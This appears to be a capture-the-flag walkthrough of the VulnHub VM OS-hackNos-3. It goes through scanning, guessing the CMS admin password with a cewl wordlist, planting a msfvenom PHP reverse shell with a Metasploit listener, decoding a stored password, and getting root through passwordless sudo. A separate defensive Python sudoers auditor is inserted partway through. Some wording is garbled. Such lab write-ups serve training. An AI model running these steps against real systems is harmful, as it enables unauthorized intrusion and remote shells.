Today we are solving OS-hackNos-3, a VulnHub VM created by Rahul Gehlaut, and finding its two flags: first the user flag and then the root flag (OS-hackNos-3 Walkthrough).
As always, our first step is to scan the network with netdiscover, the most popular Kali Linux network scanning tool (netdiscover scans the full network and shows all connected hosts).
Network Scanning
    netdiscover
After finding the target machine's IP address, we need to perform an Nmap port scan to find which ports are open on the target machine.
Port Scanning
    nmap -A 192.168.1.12
We see that two ports are open on the target machine: port 22 running an SSH server and port 80 running an httpd service. We also see the target machine's http-title, so next we open the site in our browser.
I open the site in the browser and, after enumerating the source code, we see a websec directory.
The websec directory is running a CMS application.
After a while I did not find any vulnerable plugin or theme, but the website footer shows a contact email address.
The next step is finding a password to log in to the admin account, so we create a short wordlist with the cewl wordlist generator.

    cewl http://192.168.1.12/websec -d 2 -w wordlist.txt

    cat wordlist.txt
I try the passwords one by one against the admin login; after trying 10-15 passwords we successfully log in to the admin account.
- username: [email protected]
- password: Securityx
After logging in to the admin account, we upload a PHP reverse shell: click the Content button and then File Manager.
Create a msfvenom PHP reverse shell, paste it into the target's index.php (the default web page file) and click the Save button.
Then start the Metasploit msfconsole payload listener
and open the default page http://192.168.1.12/websec in the web browser, and we get a meterpreter reverse connection.
- msfconsole
- use exploit/multi/handler
- set payload php/meterpreter/reverse_tcp (our payload name)
- set lhost 192.168.1.5
- set lport 4545
- run
Spawn a proper shell with Python's pty module:

    python3 -c 'import pty;pty.spawn("/bin/bash")'

After enumerating many directories we find a database file. We open it with the cat command and see that its last line is fackespreadsheet-encoded text, which I decode with an online fackespreadsheet decoder.
Decode Spreadsheet: copy the text from the database file, paste it into the website and click the Decode button.
The decoded text is Security@x@
We try this text as the password for the blackdevil user, switch accounts and successfully log in as blackdevil.

    su blackdevil

Now we go to see our first flag, the user flag, in the blackdevil directory.

    cat user.txt
The sudo -l command shows the sudoers entry: the blackdevil user can run any command as root without a password.

    sudo -l

    sudo su
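A defender's view of the sudo -l finding above, as an added example that is not part of the original walkthrough: a small auditor that flags sudoers rules granting passwordless root for ALL commands. The sudoers content is a constructed sample (the VM's real file is not shown on the page), and the function names are assumptions of this example.

```python
import re

# Constructed sample in sudoers syntax; the VM's real sudoers file is not shown on the page.
SAMPLE_SUDOERS = """\
Defaults env_reset
root ALL=(ALL:ALL) ALL
%sudo ALL=(ALL:ALL) ALL
blackdevil ALL=(ALL) NOPASSWD: ALL
backup ALL=(root) NOPASSWD: /usr/bin/rsync, \\
    PASSWD: ALL
deploy ALL=(www-data) NOPASSWD: ALL
"""

# One Cmnd_Spec: optional "(runas)", then tags such as "NOPASSWD:", then the command.
SPEC = re.compile(r"^(?:\(([^)]*)\)\s*)?((?:[A-Z_]+:\s*)*)(.+)$")
SKIP = ("Defaults", "User_Alias", "Runas_Alias", "Host_Alias", "Cmnd_Alias")

def logical_lines(text):
    """Join backslash continuations, then drop comments and blank lines."""
    for line in re.sub(r"\\\n\s*", " ", text).splitlines():
        line = line.split("#", 1)[0].strip()  # simplification: ignores "#include"/"#uid" forms
        if line:
            yield line

def passwordless_root(text):
    """Return users/groups allowed to run ALL commands as root with NOPASSWD."""
    hits = []
    for line in logical_lines(text):
        if line.startswith(SKIP) or "=" not in line:
            continue
        who, specs = line.split("=", 1)
        runas, nopasswd = {"root"}, False  # sudo defaults: target root, password required
        for item in re.split(r",(?![^()]*\))", specs):  # keep commas inside "(a, b)"
            m = SPEC.match(item.strip())
            if not m:
                continue
            if m.group(1) is not None:  # runas list carries over to later commands
                runas = {u.strip() for u in m.group(1).split(":")[0].split(",")}
            for tag in re.findall(r"[A-Z_]+", m.group(2)):  # tags carry over as well
                if tag in ("NOPASSWD", "PASSWD"):
                    nopasswd = tag == "NOPASSWD"
            if m.group(3).strip() == "ALL" and nopasswd and runas & {"root", "ALL"}:
                hits.append(who.split()[0])
                break
    return hits

if __name__ == "__main__":
    print(passwordless_root(SAMPLE_SUDOERS))
```

On a real host, feed it the contents of /etc/sudoers and each file under /etc/sudoers.d; any name it returns has the same one-step path to root that blackdevil has here.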
Our last flag, the root flag, is root.txt in the root directory.

    cd /root

    cat root.txt